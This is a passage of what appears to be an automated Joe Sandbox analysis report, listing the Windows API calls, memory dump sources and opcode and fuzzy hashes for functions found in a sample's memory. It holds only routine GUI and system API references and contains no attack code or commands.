                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0414229F
                                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 041422B4
                                                                                                    • ScreenToClient.USER32(00000000), ref: 041422C1
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 041422CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 2266315723-3772416878
                                                                                                    • Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                    • Instruction ID: b9c01c33a93ba63d3236c8b9c8af5b5fab4768fabf93704f692366d78826289f
                                                                                                    • Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                    • Instruction Fuzzy Hash: 1F115E71604341AFDB10EFACC8C4E8B77D8AF49354F048AA5BE68DB285D771F8408B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SaveDC.GDI32(?), ref: 041340D0
                                                                                                    • RestoreDC.GDI32(?,?), ref: 04134144
                                                                                                    • GetWindowDC.USER32(?,00000000,04134334), ref: 041341BE
                                                                                                    • SaveDC.GDI32(?), ref: 041341F5
                                                                                                    • RestoreDC.GDI32(?,?), ref: 04134262
                                                                                                    • DefWindowProcA.USER32(?,?,?,?,00000000,04134334), ref: 04134316
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSaveWindow$Proc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1975259465-0
                                                                                                    • Opcode ID: 7c20a09d5c387e8a6e346fbdcb919c38755e6a2c0582c81db17837d07a9dc359
                                                                                                    • Instruction ID: 2a1fa75cfa5ba7dabb75f326fc2a45d46fde3529e0c572da56c77c28e49314c7
                                                                                                    • Opcode Fuzzy Hash: 7c20a09d5c387e8a6e346fbdcb919c38755e6a2c0582c81db17837d07a9dc359
                                                                                                    • Instruction Fuzzy Hash: 37E12334A04219DFEB10EFA9C9C09AEB7F5EF98305B2586A5E815A7360DB34FD41CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSave$FocusWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1553564791-0
                                                                                                    • Opcode ID: 912ac8e6ad48e9ea3b514a65d347b16450b3913e6186fbe9dc20ff6f6dd12efd
                                                                                                    • Instruction ID: b428665e0e11234eb5bbcc78ee46423ea0415ae2bcfa1e49360fe1c00443c110
                                                                                                    • Opcode Fuzzy Hash: 912ac8e6ad48e9ea3b514a65d347b16450b3913e6186fbe9dc20ff6f6dd12efd
                                                                                                    • Instruction Fuzzy Hash: C7C13B31B01104AFDB15DFA8C5C9ABEB7F5EB84314F1684A5E804AB295EB34FE41DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 04153998
                                                                                                    • SetActiveWindow.USER32(?,?,?,?,04153392,00000000,04153866), ref: 041539A9
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 041539CC
                                                                                                    • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,04153392,00000000,04153866), ref: 041539E5
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,04153392,00000000,04153866), ref: 04153A2B
                                                                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,04153392,00000000,04153866), ref: 04153A79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledFocusIconicProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 848842217-0
                                                                                                    • Opcode ID: 47918aecbb41e326ccb4a240e49c72391077084516b10885629b76ad1052ae33
                                                                                                    • Instruction ID: 51c9e1b6127a9314d2af95dec4a82351a8181bd8503d192812bc45abad7bf776
                                                                                                    • Opcode Fuzzy Hash: 47918aecbb41e326ccb4a240e49c72391077084516b10885629b76ad1052ae33
                                                                                                    • Instruction Fuzzy Hash: 5D313E71700244DBEB25AE68CDC5BA93798AF04748F0810A5FE24DF2E6DBB5F8848754
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 0414195F
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0414197D
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 041419B3
                                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 041419D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Placement$Iconic
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 568898626-3772416878
                                                                                                    • Opcode ID: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
                                                                                                    • Instruction ID: 2d047a1f1e34cdd315a032f27b9ac0bd46c0b48a7d8b4baf158d19ad04c90b4a
                                                                                                    • Opcode Fuzzy Hash: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
                                                                                                    • Instruction Fuzzy Hash: 48213C71600204ABDF14EFA9C8C4ADA77A9AF89314F0485B5FE18DF24AD771F945CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 041538D3
                                                                                                    • SetActiveWindow.USER32(?,?,?,04153385,00000000,04153866), ref: 041538EB
                                                                                                      • Part of subcall function 04152F58: EnumWindows.USER32(Function_00052EE8,00000000), ref: 04152F82
                                                                                                      • Part of subcall function 04152F58: ShowOwnedPopups.USER32(00000000,?), ref: 04152FB1
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 04153917
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04153385,00000000,04153866), ref: 0415394A
                                                                                                    • DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04153385), ref: 0415395F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2995439034-0
                                                                                                    • Opcode ID: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
                                                                                                    • Instruction ID: a986509fe6a08ad6125718c6aecae4eb654a7ed6c1e8e2d3b3132bd904749300
                                                                                                    • Opcode Fuzzy Hash: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
                                                                                                    • Instruction Fuzzy Hash: 4511ECB17042449BEB54EE6DC9C5B9577A8AF44348F0840E4BE24DF1EAD775F885C720
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: MonitorFromWindow
                                                                                                    • API String ID: 190572456-2842599566
                                                                                                    • Opcode ID: 1a57ab64732fd61d23ff09a70fab8058cce45129d4a2855a176891891ace0a7a
                                                                                                    • Instruction ID: f8218b6b92f4884d3635102fe901009b156d30afd8e675fc82fa69daf276d8d2
                                                                                                    • Opcode Fuzzy Hash: 1a57ab64732fd61d23ff09a70fab8058cce45129d4a2855a176891891ace0a7a
                                                                                                    • Instruction Fuzzy Hash: 460181727001686BAB40EE949EC09FFB39CEF062D4B444051E920E7281EB3CBD6697B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0411A293
                                                                                                    • LoadResource.KERNEL32(?,0411A318,?,?,?,04115D70,?,00000001,00000000,?,0411A1BE,00000000,?), ref: 0411A2AD
                                                                                                    • SizeofResource.KERNEL32(?,0411A318,?,0411A318,?,?,?,04115D70,?,00000001,00000000,?,0411A1BE,00000000,?), ref: 0411A2C7
                                                                                                    • LockResource.KERNEL32(04119E88,00000000,?,0411A318,?,0411A318,?,?,?,04115D70,?,00000001,00000000,?,0411A1BE,00000000), ref: 0411A2D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction ID: 8ec50232a3054562826a75f3b7dd9862cffbb809527da770b62680bdd2946c1a
                                                                                                    • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction Fuzzy Hash: 24F081B32052046F6749FF6CA8C0D6B77ECEE892A4310406AF90CC7215DB71ED118374
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $c
                                                                                                    • API String ID: 0-3797896886
                                                                                                    • Opcode ID: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
                                                                                                    • Instruction ID: 023369fa3795aa69b4301f3c238452d58a072762ae12abbf9da43dbd6cc2833a
                                                                                                    • Opcode Fuzzy Hash: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
                                                                                                    • Instruction Fuzzy Hash: 4B23EF70A00205AFEB31EF64CCC4BBE77B1AF45704F1485ACE60966291EB74B984DFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04152468
                                                                                                    • GetCursorPos.USER32(?), ref: 04152485
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 041524A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1359611202-0
                                                                                                    • Opcode ID: 31a8cda3c2b0ccd6d00f650d1006013c0880e4862e959f3567dc29ba835bcdc8
                                                                                                    • Instruction ID: fd2e4febb642840e83c30173e31261cb4a21e4a840a628f7767f31c5ecc2db10
                                                                                                    • Opcode Fuzzy Hash: 31a8cda3c2b0ccd6d00f650d1006013c0880e4862e959f3567dc29ba835bcdc8
                                                                                                    • Instruction Fuzzy Hash: 83F08932204208DBFF14FB58E8C5BD973F8DF00754F4041E1D920861E1DB75B894CA11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ($($(((
                                                                                                    • API String ID: 0-2102698497
                                                                                                    • Opcode ID: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
                                                                                                    • Instruction ID: 4927768b961d606924cef9cd15dc8579fc3b42c95ebfb5580f46d326077a174e
                                                                                                    • Opcode Fuzzy Hash: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
                                                                                                    • Instruction Fuzzy Hash: B6E1CF70B04115AFFB08EE29CCC4BBA77B6DF85314F14C269E415EA2D5EB34A9458BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $@
                                                                                                    • API String ID: 0-1077428164
                                                                                                    • Opcode ID: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
                                                                                                    • Instruction ID: 9820d3626e84db65f926d9e4de098798054938e48fa8c4ddcefdd644625fe05b
                                                                                                    • Opcode Fuzzy Hash: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
                                                                                                    • Instruction Fuzzy Hash: D7722B70648705AAFB26BF64CCC6FBE36B5AF0530CF1440A9FA01A91D2EB747541CAB5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMessagePos.USER32 ref: 0413F14F
                                                                                                    • GetKeyboardState.USER32(?,?,?,?,0413F6C4), ref: 0413F24C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardMessageState
                                                                                                    • String ID:
                                                                                                    • API String ID: 3083355189-0
                                                                                                    • Opcode ID: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
                                                                                                    • Instruction ID: 57a4acc72ec372833f94b33211ff283a85f5ff4d94020cbc40ba8db6428df2ad
                                                                                                    • Opcode Fuzzy Hash: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
                                                                                                    • Instruction Fuzzy Hash: A731CD79A08741DAC328DF78C4C27DABBD0EB89315F004A2EE598D3280E774E902C796
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureIconic
                                                                                                    • String ID:
                                                                                                    • API String ID: 2277910766-0
                                                                                                    • Opcode ID: 60cfe2c810b9d5ec0cd76df373e66566d4c20693c2899bd5b26359c5345776a5
                                                                                                    • Instruction ID: d1bfd1c326a4cc446162755cff075f4288d969720cccd2cb811fffa78c30bb02
                                                                                                    • Opcode Fuzzy Hash: 60cfe2c810b9d5ec0cd76df373e66566d4c20693c2899bd5b26359c5345776a5
                                                                                                    • Instruction Fuzzy Hash: 7C112E31B14255ABAB24DF78CAD8A69B3E6AF44304B1444B4E404DF361D775FD809B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,041234F4), ref: 04123478
                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,041234F4), ref: 0412349E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: abbacc79b7a61aab56fc98ea4248ce74e5eaf07dfa4e02bdba9214a85280f1b1
                                                                                                    • Instruction ID: 5f07963369ac8c1e33829226f111e617238c6f5c10180dad9ec75b3fc362288d
                                                                                                    • Opcode Fuzzy Hash: abbacc79b7a61aab56fc98ea4248ce74e5eaf07dfa4e02bdba9214a85280f1b1
                                                                                                    • Instruction Fuzzy Hash: 7901A77034465D5BF722EBB0CDC1BD972A8EB48704F8180F4AE54D66C0EBF87D908914
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 04108F79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpace
                                                                                                    • String ID:
                                                                                                    • API String ID: 1705453755-0
                                                                                                    • Opcode ID: 11f38c077d324aaa287c190836f669b7f1f524d5c36f27bf7aed6cf4bc16df02
                                                                                                    • Instruction ID: f47fe1c83d2b9d07da8ea73a559e04f67c8a83911caf594622a878a5a338d4c8
                                                                                                    • Opcode Fuzzy Hash: 11f38c077d324aaa287c190836f669b7f1f524d5c36f27bf7aed6cf4bc16df02
                                                                                                    • Instruction Fuzzy Hash: 311100B5A00209AF9B00CFA9C8809AFB7F9EFC8314B14C569A504E7250E671AA01CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                    • Instruction ID: 6db5613efc6fc4a0afa2fd04fefd015ac1d3431b18f41d36ae4141920bd7b1eb
                                                                                                    • Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                    • Instruction Fuzzy Hash: 2EE0D8727142181BE715A5A88CC4AFA725C9758310F00827BBA48C73C5EFE0FD9043E8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0410D07E,00000000,0410D297,?,?,00000000,00000000), ref: 0410B923
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                    • Instruction ID: 9125456b7c04cea678e398b62a69f26138fbd399c9d60b3e6ffa8b84593af789
                                                                                                    • Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                    • Instruction Fuzzy Hash: 2ED05EB230E2603AB214919A2DC4E7B5EDCCAC5AA5F01C07AB588C6282D380AC069671
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 481472006-0
                                                                                                    • Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
